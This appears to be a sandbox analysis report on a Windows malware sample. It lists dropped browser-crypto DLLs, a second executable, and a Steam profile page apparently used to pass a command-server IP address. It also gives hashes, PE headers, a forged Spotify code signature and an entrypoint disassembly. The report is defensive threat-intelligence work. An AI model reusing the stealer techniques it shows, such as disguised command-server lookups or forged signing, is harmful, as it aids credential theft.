                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):608080
                                                                                                                                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):450024
                                                                                                                                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\nss3.dll

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2046288
                                                                                                                                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):257872
                                                                                                                                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):80880
                                                                                                                                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199780418869[1].htm

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):34879
                                                                                                                                                                                                                    Entropy (8bit):5.398288267525573
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:Mdpqme0Ih+3tAA6WGWefcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x28:Md8me0Ih+3tAA6WGWeFhTBv++nIjBtPY
                                                                                                                                                                                                                    MD5:937AF9CA5D9AE8BBA7A1DEEAC1B5FE56
                                                                                                                                                                                                                    SHA1:E9C04993C99B7F1561C2924D42C684BAB531035A
                                                                                                                                                                                                                    SHA-256:2A6E3726D57F9C4BAF90A11009715C9748419F62EB3C7B9ADA420A72F25985EF
                                                                                                                                                                                                                    SHA-512:ACF126A9A8FF18DDAD2A6234FEE013F5C47EC9B04A171CB51CB9BBEE09FF042A94D63418F10C903BEE54A15B48413B37125CC0E28246A42183E02FDE90636A47
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.197.9|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href=

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\a43486128347[1].exe

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):540536
                                                                                                                                                                                                                    Entropy (8bit):7.7458511305233015
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:TP12qROL6BdHCinYPrcYVfplaR3eumU9bxsG6oDPZ:xXXPiinMIKlaROymxo7Z
                                                                                                                                                                                                                    MD5:49504D08DC10AECA7D36605D6A20BDE0
                                                                                                                                                                                                                    SHA1:BB6CBFC6EF07C8EE1F287F3BE5690D0FFA5AC9EA
                                                                                                                                                                                                                    SHA-256:A6B03FCC5F34E1A4546A92C1B6CCC6ED2DDC92965437D0BB64D4F0E515E22C0E
                                                                                                                                                                                                                    SHA-512:33B6B2AD17C160BF5543D95CB0D2C000FB0B89FDE8BC55DA8424FDEFFA3A4CCC3DE7185CE2E520C421624F714CCFCF83DB09469359F4D41F74B7C2E840C9CA2D
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$..`..`..`.....l...........u..R..r..R..t.....e..`..9..R.....Q..a..Qz.a..Q..a..Rich`..........PE..L......f...............'.....Z......ro............@..........................`............@.................................0m..<....0..................x)...@......xP...............................O..@...............4............................text............................... ..`.rdata..$...........................@..@.data................b..............@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:EBCDIC text, with very long lines (65536), with no line terminators, with overstriking
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1048575
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:X7:r
                                                                                                                                                                                                                    MD5:6C37C81FBB253DEA370A9BB1B013084A
                                                                                                                                                                                                                    SHA1:AF9E05215B75BE7D5636DBA75793319833F5A67A
                                                                                                                                                                                                                    SHA-256:F0CBC300DFD548B8CFB6764348F28F318A379AE04B177140E86976230BDADF53
                                                                                                                                                                                                                    SHA-512:F4BCECEEAEA0CF027172B52AE05B5E9FF4AE9A80C170D7D0E30AB9A727759478644790F62C41A5963DD9E0C3BE3B5870B65A242CA7CD3CFDBF441BC7E20BA52E
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                                                                    Entropy (8bit):4.37456230525771
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:BFVfpi6ceLP/9skLmb0dyWWSPtaJG8nAge35OlMMhA2AX4WABlguNciL:nV1XyWWI/glMM6kF7qq
                                                                                                                                                                                                                    MD5:744F9BC57AF1580E267ADF1A38AD0162
                                                                                                                                                                                                                    SHA1:44BDA3C017753B8924B92355F4D483E8C0A48A0B
                                                                                                                                                                                                                    SHA-256:EEDB51D326933F1AC2B7F26253A6834452E04ACB8A9257E8DEF034C08DE37105
                                                                                                                                                                                                                    SHA-512:AE27738831D41B91AB60FE9DDE83E8A00E12B9DB37B779AC5DDBBE658F5F3DD150E846DCCCFB21D30C3D0D1884E679BFABC06A0246B16F8B0CCAFDEDE3062643
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:regfD...D....\.Z.................... ....@......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmr.O ................................................................................................................................................................................................................................................................................................................................................B.X.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Entropy (8bit):7.768601032668871
                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                    File name:file.exe
                                                                                                                                                                                                                    File size:573'304 bytes
                                                                                                                                                                                                                    MD5:c9784db0c88a05a8aae9ddb7289b51db
                                                                                                                                                                                                                    SHA1:7ce51feb0e818f5acb6ba4f1deb9f4fef04d7cd6
                                                                                                                                                                                                                    SHA256:fa8e8dfb272f18daaece8b6ac3f9d6b16f9484764aff1005c9096909d75f760d
                                                                                                                                                                                                                    SHA512:5dcbe1ea972859d9be452355774aef12c99a65824e7ffc47f6229ee0ca8d460b0d6ef2c9209dd03eb92fc48ab89d4a96bb2fc0c5518111e55361b1ddad70b095
                                                                                                                                                                                                                    SSDEEP:12288:W/VmqBOr6mq0eOValpFrLeIOu2qSturmTdFtiDPF:0nHYKr5iIOu2qcOmTnti7F
                                                                                                                                                                                                                    TLSH:7EC4011175C08031CA73163619E8DB745E7EBD614AB2AE9F67944B7E0F302C2D621BBB
                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$...`...`...`.......l...............u....R..r....R..t.......e...`...9....R.......Q..a....Qz.a....Q..a...Rich`...........PE..L..

                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                    Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Entrypoint:0x406f72
                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                    Time Stamp:0x66FE9326 [Thu Oct 3 12:50:46 2024 UTC]
                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                    Import Hash:1186293b831ff45d8016d71d51f87333

                                                                                                                                                                                                                    Authenticode Signature

                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                    • 22/09/2022 02:00:00 20/10/2023 01:59:59
                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                    • CN=Spotify AB, O=Spotify AB, L=Stockholm, C=SE, SERIALNUMBER=5567037485, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=SE
                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                    Thumbprint MD5:EF8873EED657F2DFE432077ADBAB8AFB
                                                                                                                                                                                                                    Thumbprint SHA-1:3F76C6CC576963831FF44303BFCB98113C51C95E
                                                                                                                                                                                                                    Thumbprint SHA-256:890C79F427B0C07DEF096FF66A402E9337F0F2D80DACA1256A7F572F7720DBAA
                                                                                                                                                                                                                    Serial:04C530703A210EC1D6F83CB4FE1118C5

                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                    call 00007FA7E4B47FAAh
                                                                                                                                                                                                                    jmp 00007FA7E4B4768Fh
                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                    mov ecx, dword ptr [eax+3Ch]
                                                                                                                                                                                                                    add ecx, eax
                                                                                                                                                                                                                    movzx eax, word ptr [ecx+14h]
                                                                                                                                                                                                                    lea edx, dword ptr [ecx+18h]
                                                                                                                                                                                                                    add edx, eax
                                                                                                                                                                                                                    movzx eax, word ptr [ecx+06h]
                                                                                                                                                                                                                    imul esi, eax, 28h
                                                                                                                                                                                                                    add esi, edx
                                                                                                                                                                                                                    cmp edx, esi
                                                                                                                                                                                                                    je 00007FA7E4B4782Bh
                                                                                                                                                                                                                    mov ecx, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                    cmp ecx, dword ptr [edx+0Ch]
                                                                                                                                                                                                                    jc 00007FA7E4B4781Ch
                                                                                                                                                                                                                    mov eax, dword ptr [edx+08h]
                                                                                                                                                                                                                    add eax, dword ptr [edx+0Ch]
                                                                                                                                                                                                                    cmp ecx, eax
                                                                                                                                                                                                                    jc 00007FA7E4B4781Eh
                                                                                                                                                                                                                    add edx, 28h
                                                                                                                                                                                                                    cmp edx, esi
                                                                                                                                                                                                                    jne 00007FA7E4B477FCh
                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                    pop ebp
                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                    mov eax, edx
                                                                                                                                                                                                                    jmp 00007FA7E4B4780Bh
                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                    call 00007FA7E4B482B4h
                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                    je 00007FA7E4B47832h
                                                                                                                                                                                                                    mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                                    mov esi, 004898C0h
                                                                                                                                                                                                                    mov edx, dword ptr [eax+04h]
                                                                                                                                                                                                                    jmp 00007FA7E4B47816h
                                                                                                                                                                                                                    cmp edx, eax
                                                                                                                                                                                                                    je 00007FA7E4B47822h
                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                    mov ecx, edx
                                                                                                                                                                                                                    lock cmpxchg dword ptr [esi], ecx
                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                    jne 00007FA7E4B47802h
                                                                                                                                                                                                                    xor al, al
                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                    mov al, 01h
                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                    cmp dword ptr [ebp+08h], 00000000h
                                                                                                                                                                                                                    jne 00007FA7E4B47819h
                                                                                                                                                                                                                    mov byte ptr [004898C4h], 00000001h
                                                                                                                                                                                                                    call 00007FA7E4B47AD7h
                                                                                                                                                                                                                    call 00007FA7E4B4A844h
                                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                                    jne 00007FA7E4B47816h
                                                                                                                                                                                                                    xor al, al
                                                                                                                                                                                                                    pop ebp
                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                    call 00007FA7E4B51395h
                                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                                    jne 00007FA7E4B4781Ch
                                                                                                                                                                                                                    push 00000000h
                                                                                                                                                                                                                    call 00007FA7E4B4A84Bh
                                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                                    jmp 00007FA7E4B477FBh
                                                                                                                                                                                                                    mov al, 01h
                                                                                                                                                                                                                    pop ebp
                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                    cmp byte ptr [004898C5h], 00000000h
                                                                                                                                                                                                                    je 00007FA7E4B47816h

                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x26d300x3c.rdata
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x8b0000x1e0.rsrc
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x896000x2978
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000x1aec.reloc
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x250780x1c.rdata
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x24fb80x40.rdata
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x1e0000x134.rdata
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                    .text0x10000x1c6cc0x1c8005d01ce9daed9f6709f9e991a74cf1582False0.5815686677631579data6.639339648919584IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .rdata0x1e0000x94240x96009a6b58223837662d548d3440ddb18c78False0.38614583333333335data4.652775533496149IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .data0x280000x624d00x61600bda977ba809dd7ca887a6ddabde07e45False0.9919468068035944DOS executable (block device driver \377\377\377\377)7.994010542069725IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                    .rsrc0x8b0000x1e00x200f5eac9bb7a5931fe3c044829d9bd33ddFalse0.53125data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .reloc0x8c0000x1aec0x1c006d5dd1e28cfe7ce900c92cc7ddef11f5False0.7346540178571429data6.441550202622086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                    Resources

                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                    RT_MANIFEST0x8b0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                    USER32.dllSetCursorPos
